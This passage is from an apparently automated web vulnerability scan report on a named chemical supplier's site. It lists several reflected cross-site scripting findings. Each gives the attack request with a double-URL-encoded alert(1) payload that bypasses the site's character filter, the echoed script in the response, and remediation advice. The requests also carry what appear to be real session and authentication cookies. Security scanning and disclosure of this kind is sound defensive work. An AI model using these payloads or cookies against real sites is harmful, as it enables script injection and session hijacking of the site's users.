Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:50 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/socialdc581";alert(1)//f0308a4b9/youtube-25x25","E404") ;
   </script>
...[SNIP]...

1.492. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7800c%2522%253balert%25281%2529%252f%252f6b8293069f5 was submitted in the REST URL parameter 5. This input was echoed as 7800c";alert(1)//6b8293069f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social/youtube-25x257800c%2522%253balert%25281%2529%252f%252f6b8293069f5 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:53 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social/youtube-25x257800c";alert(1)//6b8293069f5","E404") ;
   </script>
...[SNIP]...

1.493. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/splash-hex

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eae19%2522%253balert%25281%2529%252f%252ffd28aef77b3 was submitted in the REST URL parameter 1. This input was echoed as eae19";alert(1)//fd28aef77b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etceae19%2522%253balert%25281%2529%252f%252ffd28aef77b3/medialib/sigma-aldrich/splash-hex HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:30 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etceae19";alert(1)//fd28aef77b3/medialib/sigma-aldrich/splash-hex","E404") ;
   </script>
...[SNIP]...

1.494. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/splash-hex

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f00a7%2522%253balert%25281%2529%252f%252f0ec43bcc0ed was submitted in the REST URL parameter 2. This input was echoed as f00a7";alert(1)//0ec43bcc0ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibf00a7%2522%253balert%25281%2529%252f%252f0ec43bcc0ed/sigma-aldrich/splash-hex HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:31 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibf00a7";alert(1)//0ec43bcc0ed/sigma-aldrich/splash-hex","E404") ;
   </script>
...[SNIP]...

1.495. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/splash-hex

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c0fa%2522%253balert%25281%2529%252f%252f12241bca07a was submitted in the REST URL parameter 3. This input was echoed as 3c0fa";alert(1)//12241bca07a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich3c0fa%2522%253balert%25281%2529%252f%252f12241bca07a/splash-hex HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:33 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich3c0fa";alert(1)//12241bca07a/splash-hex","E404") ;
   </script>
...[SNIP]...

1.496. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/splash-hex

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c46%2522%253balert%25281%2529%252f%252fc83f6df0c1c was submitted in the REST URL parameter 4. This input was echoed as c7c46";alert(1)//c83f6df0c1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/splash-hexc7c46%2522%253balert%25281%2529%252f%252fc83f6df0c1c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
